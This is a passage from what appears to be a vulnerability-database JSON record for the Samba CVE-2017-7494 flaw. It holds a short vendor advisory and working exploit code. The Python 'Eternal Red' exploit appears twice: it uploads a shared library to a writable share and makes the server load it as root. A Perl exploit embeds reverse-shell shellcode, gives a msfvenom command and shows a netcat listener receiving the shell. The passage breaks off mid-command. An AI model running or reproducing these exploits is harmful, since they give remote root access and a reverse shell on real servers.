\"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n \r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n \r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n \r\n return None\r\n \r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n \r\n return True\r\n \r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n \r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n \r\n print(\"[+] Attempting to load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n \r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n \r\n return\r\n \r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n \r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n \r\n if share is None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n \r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n \r\n conn.close()\r\n \r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n \r\n For local exploit provide the full path to your shared library to load\r\n \r\n Your shared library should look something like this\r\n \r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n \r\n if not os.path.isfile(args.payload):\r\n print(\"[!] Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n \r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n \r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n \r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n \r\n load_payload(user, password, args.server, port, fullpath)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/27836", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2020-12-24T13:20:56", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.", "edition": 6, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "SAMBA:CVE-2017-7494", "href": "https://www.samba.org/samba/security/CVE-2017-7494.html", "title": "Remote code execution from a writable share. ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-05-26T05:54:17", "description": "", "published": "2017-05-25T00:00:00", "type": "packetstorm", "title": "Samba 3.5.0 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "id": "PACKETSTORM:142657", "href": "https://packetstormsecurity.com/files/142657/Samba-3.5.0-Remote-Code-Execution.html", "sourceData": "`#! /usr/bin/env python \n# Title : ETERNALRED \n# Date: 05/24/2017 \n# Exploit Author: steelo <knownsteelo@gmail.com> \n# Vendor Homepage: https://www.samba.org \n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 \n# CVE-2017-7494 \n \n \nimport argparse \nimport os.path \nimport sys \nimport tempfile \nimport time \nfrom smb.SMBConnection import SMBConnection \nfrom smb import smb_structs \nfrom smb.base import _PendingRequest \nfrom smb.smb2_structs import * \nfrom smb.base import * \n \n \nclass SharedDevice2(SharedDevice): \ndef __init__(self, type, name, comments, path, password): \nsuper().__init__(type, name, comments) \nself.path = path \nself.password = password \n \nclass SMBConnectionEx(SMBConnection): \ndef __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False): \nsuper().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp) \n \n \ndef hook_listShares(self): \nself._listShares = self.listSharesEx \n \ndef hook_retrieveFile(self): \nself._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix \n \n# This is maily the original listShares but request a higher level of info \ndef listSharesEx(self, callback, errback, timeout = 30): \nif not self.has_authenticated: \nraise NotReadyError('SMB connection not authenticated') \n \nexpiry_time = time.time() + timeout \npath = 'IPC$' \nmessages_history = [ ] \n \ndef connectSrvSvc(tid): \nm = SMB2Message(SMB2CreateRequest('srvsvc', \nfile_attributes = 0, \naccess_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE, \nshare_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \noplock = SMB2_OPLOCK_LEVEL_NONE, \nimpersonation = SEC_IMPERSONATE, \ncreate_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL, \ncreate_disp = FILE_OPEN)) \n \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback) \nmessages_history.append(m) \n \ndef connectSrvSvcCB(create_message, **kwargs): \nmessages_history.append(create_message) \nif create_message.status == 0: \ncall_id = self._getNextRPCCallID() \n# The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706] \n# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream \ndata_bytes = \\ \nbinascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<I', call_id) + \\ \nbinascii.unhexlify(b\"\"\" \nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00 \nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 \n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 \n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b \n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 \n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00 \n01 00 00 00 \n\"\"\".replace(b' ', b'').replace(b'\\n', b'')) \nm = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0)) \nm.tid = create_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid) \nmessages_history.append(m) \nelse: \nerrback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history)) \n \ndef rpcBindCB(trans_message, **kwargs): \nmessages_history.append(trans_message) \nif trans_message.status == 0: \nm = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0)) \nm.tid = trans_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid']) \nmessages_history.append(m) \nelse: \ncloseFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint') \n \ndef rpcReadCB(read_message, **kwargs): \nmessages_history.append(read_message) \nif read_message.status == 0: \ncall_id = self._getNextRPCCallID() \n \npadding = b'' \nremote_name = '\\\\\\\\' + self.remote_name \nserver_len = len(remote_name) + 1 \nserver_bytes_len = server_len * 2 \nif server_len % 2 != 0: \npadding = b'\\0\\0' \nserver_bytes_len += 2 \n \n# The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. \n# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream \ndata_bytes = \\ \nbinascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\ \nbinascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\ \nstruct.pack('<III', server_len, 0, server_len) + \\ \n(remote_name + '\\0').encode('UTF-16LE') + padding + \\ \nbinascii.unhexlify(b\"\"\" \n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00 \n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 \n\"\"\".replace(b' ', b'').replace(b'\\n', b'')) \nm = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes)) \nm.tid = read_message.tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) \nmessages_history.append(m) \nelse: \ncloseFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint') \n \ndef listShareResultsCB(result_message, **kwargs): \nmessages_history.append(result_message) \nif result_message.status == 0: \n# The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. \ndata_bytes = result_message.payload.out_data \n \nif data_bytes[3] & 0x02 == 0: \nsendReadRequest(result_message.tid, kwargs['fid'], data_bytes) \nelse: \ndecodeResults(result_message.tid, kwargs['fid'], data_bytes) \nelif result_message.status == 0x0103: # STATUS_PENDING \nself.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) \nelse: \ncloseFid(result_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) \n \ndef decodeResults(tid, fid, data_bytes): \nshares_count = struct.unpack('<I', data_bytes[36:40])[0] \nresults = [ ] # A list of SharedDevice2 instances \noffset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants \nfor i in range(0, shares_count): \nresults.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None)) \noffset += 12 \n \nfor i in range(0, shares_count): \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \nmax_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) \noffset += 12 \nresults[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') \n \nif length % 2 != 0: \noffset += (length * 2 + 2) \nelse: \noffset += (length * 2) \n \n \ncloseFid(tid, fid) \ncallback(results) \n \ndef sendReadRequest(tid, fid, data_bytes): \nread_count = min(4280, self.max_read_size) \nm = SMB2Message(SMB2ReadRequest(fid, 0, read_count)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, \nfid = fid, data_bytes = data_bytes) \n \ndef readCB(read_message, **kwargs): \nmessages_history.append(read_message) \nif read_message.status == 0: \ndata_len = read_message.payload.data_length \ndata_bytes = read_message.payload.data \n \nif data_bytes[3] & 0x02 == 0: \nsendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) \nelse: \ndecodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) \nelse: \ncloseFid(read_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) \n \ndef closeFid(tid, fid, results = None, error = None): \nm = SMB2Message(SMB2CloseRequest(fid)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error) \nmessages_history.append(m) \n \ndef closeCB(close_message, **kwargs): \nif kwargs['results'] is not None: \ncallback(kwargs['results']) \nelif kwargs['error'] is not None: \nerrback(OperationFailure(kwargs['error'], messages_history)) \n \nif path not in self.connected_trees: \ndef connectCB(connect_message, **kwargs): \nmessages_history.append(connect_message) \nif connect_message.status == 0: \nself.connected_trees[path] = connect_message.tid \nconnectSrvSvc(connect_message.tid) \nelse: \nerrback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history)) \n \nm = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path ))) \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path) \nmessages_history.append(m) \nelse: \nconnectSrvSvc(self.connected_trees[path]) \n \n \n# Don't convert to Window style path \ndef _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30): \nif not self.has_authenticated: \nraise NotReadyError('SMB connection not authenticated') \n \nmessages_history = [ ] \n \n \ndef sendOpen(tid): \nm = SMBMessage(ComOpenAndxRequest(filename = path, \naccess_mode = 0x0040, # Sharing mode: Deny nothing to others \nopen_mode = 0x0001, # Failed if file does not exist \nsearch_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM, \ntimeout = timeout * 1000)) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback) \nmessages_history.append(m) \n \ndef openCB(open_message, **kwargs): \nmessages_history.append(open_message) \nif not open_message.status.hasError: \nif max_length == 0: \ncloseFid(open_message.tid, open_message.payload.fid) \ncallback(( file_obj, open_message.payload.file_attributes, 0 )) \nelse: \nsendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length) \nelse: \nerrback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history)) \n \ndef sendRead(tid, fid, offset, file_attributes, read_len, remaining_len): \nread_count = self.max_raw_size - 2 \nm = SMBMessage(ComReadAndxRequest(fid = fid, \noffset = offset, \nmax_return_bytes_count = read_count, \nmin_return_bytes_count = min(0xFFFF, read_count))) \nm.tid = tid \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes, \nread_len = read_len, remaining_len = remaining_len) \n \ndef readCB(read_message, **kwargs): \n# To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history. \nif not read_message.status.hasError: \nread_len = kwargs['read_len'] \nremaining_len = kwargs['remaining_len'] \ndata_len = read_message.payload.data_length \nif max_length > 0: \nif data_len > remaining_len: \nfile_obj.write(read_message.payload.data[:remaining_len]) \nread_len += remaining_len \nremaining_len = 0 \nelse: \nfile_obj.write(read_message.payload.data) \nremaining_len -= data_len \nread_len += data_len \nelse: \nfile_obj.write(read_message.payload.data) \nread_len += data_len \n \nif (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2): \ncloseFid(read_message.tid, kwargs['fid']) \ncallback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements \nelse: \nsendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len) \nelse: \nmessages_history.append(read_message) \ncloseFid(read_message.tid, kwargs['fid']) \nerrback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history)) \n \ndef closeFid(tid, fid): \nm = SMBMessage(ComCloseRequest(fid)) \nm.tid = tid \nself._sendSMBMessage(m) \nmessages_history.append(m) \n \nif service_name not in self.connected_trees: \ndef connectCB(connect_message, **kwargs): \nmessages_history.append(connect_message) \nif not connect_message.status.hasError: \nself.connected_trees[service_name] = connect_message.tid \nsendOpen(connect_message.tid) \nelse: \nerrback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history)) \n \nm = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, '')) \nself._sendSMBMessage(m) \nself.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name) \nmessages_history.append(m) \nelse: \nsendOpen(self.connected_trees[service_name]) \n \ndef get_connection(user, password, server, port, force_smb1=False): \nif force_smb1: \nsmb_structs.SUPPORT_SMB2 = False \n \nconn = SMBConnectionEx(user, password, \"\", \"server\") \nassert conn.connect(server, port) \nreturn conn \n \ndef get_share_info(conn): \nconn.hook_listShares() \nreturn conn.listShares() \n \ndef find_writeable_share(conn, shares): \nprint(\"[+] Searching for writable share\") \nfilename = \"red\" \ntest_file = tempfile.TemporaryFile() \nfor share in shares: \ntry: \n# If it's not writeable this will throw \nconn.storeFile(share.name, filename, test_file) \nconn.deleteFiles(share.name, filename) \nprint(\"[+] Found writeable share: \" + share.name) \nreturn share \nexcept: \npass \n \nreturn None \n \ndef write_payload(conn, share, payload, payload_name): \nwith open(payload, \"rb\") as fin: \nconn.storeFile(share.name, payload_name, fin) \n \nreturn True \n \ndef convert_share_path(share): \npath = share.path[2:] \npath = path.replace(\"\\\\\", \"/\") \nreturn path \n \ndef load_payload(user, password, server, port, fullpath): \nconn = get_connection(user, password, server, port, force_smb1 = True) \nconn.hook_retrieveFile() \n \nprint(\"[+] Attempting to load payload\") \ntemp_file = tempfile.TemporaryFile() \n \ntry: \nconn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file) \nexcept: \npass \n \nreturn \n \ndef drop_payload(user, password, server, port, payload): \npayload_name = \"charizard\" \n \nconn = get_connection(user, password, server, port) \nshares = get_share_info(conn) \nshare = find_writeable_share(conn, shares) \n \nif share is None: \nprint(\"[!] No writeable shares on \" + server + \" for user: \" + user) \nsys.exit(-1) \n \nif not write_payload(conn, share, payload, payload_name): \nprint(\"[!] Failed to write payload: \" + str(payload) + \" to server\") \nsys.exit(-1) \n \nconn.close() \n \nfullpath = convert_share_path(share) \nreturn os.path.join(fullpath, payload_name) \n \n \ndef main(): \nparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, \ndescription= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494 \nCauses vulnerable Samba server to load a shared library in root context \nCredentials are not required if the server has a guest account \nFor remote exploit you must have write permissions to at least one share \nEternal Red will scan the Samba server for shares it can write to \nIt will also determine the fullpath of the remote share \n \nFor local exploit provide the full path to your shared library to load \n \nYour shared library should look something like this \n \nextern bool change_to_root_user(void); \nint samba_init_module(void) \n{ \nchange_to_root_user(); \n/* Do what thou wilt */ \n} \n\"\"\") \nparser.add_argument(\"payload\", help=\"path to shared library to load\", type=str) \nparser.add_argument(\"server\", help=\"Server to target\", type=str) \nparser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int) \nparser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str) \nparser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str) \nparser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool) \nargs = parser.parse_args() \n \nif not os.path.isfile(args.payload): \nprint(\"[!] Unable to open: \" + args.payload) \nsys.exit(-1) \n \nport = 445 \nuser = \"nobody\" \npassword = \"\" \nfullpath = \"\" \n \nif args.port: \nport = args.port \nif args.username: \nuser = args.username \nif args.password: \npassword = args.password \n \nif args.local: \nfullpath = args.payload \nelse: \nfullpath = drop_payload(user, password, args.server, port, args.payload) \n \nload_payload(user, password, args.server, port, fullpath) \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142657/samba360-exec.txt"}, {"lastseen": "2017-06-03T01:20:09", "description": "", "published": "2017-06-02T00:00:00", "type": "packetstorm", "title": "Samba is_known_pipename() Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-06-02T00:00:00", "id": "PACKETSTORM:142782", "href": "https://packetstormsecurity.com/files/142782/Samba-is_known_pipename-Code-Execution.html", "sourceData": "`#!/usr/bin/perl -w \n \n#Remote Samba is_known_pipename() ( 3.5.0 to 4.4.14, 4.5.10, and 4.6.4.) Exploit By N_A , N_A[at]tutanota.com \n \n#The orginal bug was discovered by steelo <knownsteelo[at]gmail.com> \n#CVE-2017-7494 \n#https://www.samba.org/samba/security/CVE-2017-7494.html \n \n#Tested on Samba 4.5.8-Debian \n \n \n#Requirments for this exploit to run: \n \n#perl -MCPAN -e 'install Filesys::SmbClientParser' \n#git clone https://github.com/CoreSecurity/impacket and then install the package \n \n \n \n#How to use this exploit: \n \n#This exploit loads a hacked library file into a vulnerable samba server and provides a reverse shell. ( you will need to swap the shellcode ) \n#A writable samba share is required or valid credentials to a samba share that allows write access to the share. \n#You need to know the server side location path of the writable share. For example if the share with write access is called 'blah' then you will \n#need to know the full server side path i.e '/home/billybobthornton/blah' \n#That is all. This exploit creates a hacked library file and loads it into the remote writable samba share and then uses the DCE/RPC protocol to \n#create a ncacn_np request to a named pipe ( the hacked library file ) and executes it. \n \n#The exploit uses the impacket library files by CoreSecurity to send the DCE/RPC packet. I have tried playing with Perl's DCE::Perl::RPC and did \n#not have much luck with this package. Its over 10 years old and i could not find any relevant documentation to aid me in creating a valid request \n#that would trigger a named pipe request. \n \n#If anyone knows an easier way to do this in Perl please contact me , even if its regarding wireshark captures of the DCE/RPC protocol. \n#Email me on N_A[at]tutanota.com, thank you :) \n \n \n \n#root@kali:~/exploits# perl NAsamba.pl -h 192.168.142.128 -s anonymous -l /home/NA/anonymous \n#[*]No Port Specified - Using Port 445 as default \n#[*]No user specified - Using 'nobody' as default user \n#[*]No password specified - Leaving password blank \n#[*]Using Host: 192.168.142.128 on port: 445 \n#[*]Username: nobody \n#[*]Password: \n#[*]Attacking Share: anonymous on Host: 192.168.142.128 Port: 445 \n#[*]Creating Pure Evil \n#[*]Evil File Created Successfully! \n#Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian] \n#[*]Evil File transferred to Samba Server! \n#[*]Triggering exploit \n#[*]G0t r00t? \n \n \n \n \n#A terminal with a netcat listener set up on port 443 \n \n#root@kali:~/exploits# nc -nlvp 443 \n#listening on [any] 443 ... \n#connect to [192.168.142.140] from (UNKNOWN) [192.168.142.128] 36214 \n#sh -i; \n#sh: 0: can't access tty; job control turned off \n#$ id \n#uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) \n#$ \n \n \n \n \n \n#Greetz - Listen m0use i have been busy all week, didnt i tell i was working on stuff? Relax. R-E-L-A-X. Relaaaax. \n#Greetz to the Wu-tang clan and all killabeez ;P \n \n \n \n \n \nuse POSIX; \nuse Filesys::SmbClientParser; \nuse strict; \nuse warnings; \nuse Getopt::Long qw(GetOptions); \n \n \n \n#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c - change this to your own LHOST and LPORT to receive connection \n#And then replace the resultant shellcode below: \n#Note: Replace all double quotes \" in the shellcode with single quotes ' before replacing shellcode. \n \n \nmy $shellcode = '\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80'. \n'\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68\\xc0\\xa8\\x8e\\x80\\x68'. \n'\\x02\\x00\\x01\\xbb\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1'. \n'\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3'. \n'\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'; \n \n \n#These are our evil files \nmy $evil_header =\"#ifndef evil_h__\\n\".\"#define evil_h__\\n\".\"extern int samba_init_module(void);\\n\".'#endif'; \nmy $evil =\"#include <stdio.h>\\n\".'int samba_init_module(void){ unsigned char shellcode[]='.'\"'.$shellcode.'\"'.\";\".'(*(void(*)()) shellcode)();return 0;}'; \n \nmy $evil_header_file = 'evil.h'; \nmy $evil_file = 'evil.c'; \n \n \n \n \n#creating evil library , libevil.so \nsub create_evil() \n{ \n \nopen(my $fh, '>', $evil_file) or die \"[*]Could not open evil.c\"; \nprint $fh $evil; \nopen($fh, '>', $evil_header_file) or die \"[*]Could not open evil.h\"; \nprint $fh $evil_header; \nclose $fh; \nsystem(\"gcc -c -Wall -Werror -fpic evil.c\"); \nsystem(\"gcc -shared -o libevil.so evil.o\"); \nprint \"[*]Evil File Created Successfully!\\n\"; \n} \n \n \nsub usage() \n{ \nprint \"\\n\\n-=[*]Remote Samba is_known_pipename() Root Exploit[*]=-\\n\\n\"; \nprint \"\\t\\t-=By N_A=-\\n\\n\"; \nprint \"[*]Usage: $0 --host hostname --port port --user user --password pass --share writable-share --location /server/side/path\\n\\n\"; \nprint \"[*]$0 --host 127.0.0.1 --port 445 --user nobody --password pass --share temp --location /home/blah/temp\\n\"; \nprint \"[*]$0 -h 127.0.0.1 -p 139 -u admin -pa adminpass -s stuff -l /var/samba/stuff\\n\\n\"; \nprint \"[*]Note: No username provided defaults to user name 'nobody'\\n\"; \nprint \"[*]Note: No port provided defaults to port '445'\\n\"; \nprint \"[*]Note: No password provided defaults to a blank password\\n\"; \nexit; \n} \n \n \nmy $host; #host to attack \nmy $port; #port on host to attack , default is 445 \nmy $user; #username on host to use, default is nobody \nmy $password; #password to use, default is left as blank \nmy $share; #path to the writable share to use \nmy $location; #this is the location on the server side of the share. We need this to access our libevil.so \n \n \nGetOptions('host|h=s' => \\$host, 'port|p=s' => \\$port,'user|u=s' => \\$user, 'password|pa=s' => \\$password, 'share|s=s' => \\$share, 'location|l=s' => \\$location,) or die usage(); \n \n \n \nif(!$location) \n{ \n \nusage(); \n} \n \nif(!$host) \n{ \n \nusage(); \n} \n \n \nif(!$port) \n{ \nprint \"[*]No Port Specified - Using Port 445 as default\\n\"; \n$port = 445; \n} \n \nif(!$user) \n{ \nprint \"[*]No user specified - Using 'nobody' as default user\\n\"; \n$user = \"nobody\"; \n} \n \nif(!$password) \n{ \nprint \"[*]No password specified - Leaving password blank\\n\"; \n$password = \"\"; \n} \n \n \nif(!$share) \n{ \nprint \"[*]Writable Share missing\\n\"; \nusage(); \n} \n \n \nmy $smb = new Filesys::SmbClientParser \n(undef, \n( \nuser => $user, \npassword => $password \n)); \n \n \n$smb->Host($host); \n \nprint \"[*]Using Host: $host on port: $port\\n\"; \nprint \"[*]Username: $user\\n\"; \nprint \"[*]Password: $password\\n\"; \nprint \"[*]Attacking Share: $share on Host: $host Port: $port\\n\"; \nprint \"[*]Creating Pure Evil\\n\"; \ncreate_evil(); \n \n$smb->Share($share); #Locating correct writable share \n \n$smb->put(\"libevil.so\"); #transferring libevil.so to the writeable share \nprint \"[*]Evil File transferred to Samba Server!\\n\"; \nprint \"[*]Triggering exploit\\n\"; \nprint \"[*]G0t r00t?\\n\"; \n \n#All should be well at this point. All thats left is to trigger the exploit. \n#A dirty hack below. There was not much documentation on DCE::Perl::RPC which is required to send requests to named pipes \n#Using impacket from the command line, via system() call. \n \nmy $evil_lib = '/libevil.so'; \nmy $stringbind = \"python -c 'from impacket.dcerpc.v5 import transport; st=\\\"$host\\\";stt=\\\"$location/libevil.so\\\";s=r\\\"ncacn_np:%s[\\\\pipe%s]\\\" % (st,stt); rpctrans = transport.DCERPCTransportFactory(s); dce = rpctrans.get_dce_rpc(); dce.connect();'\"; \n \n 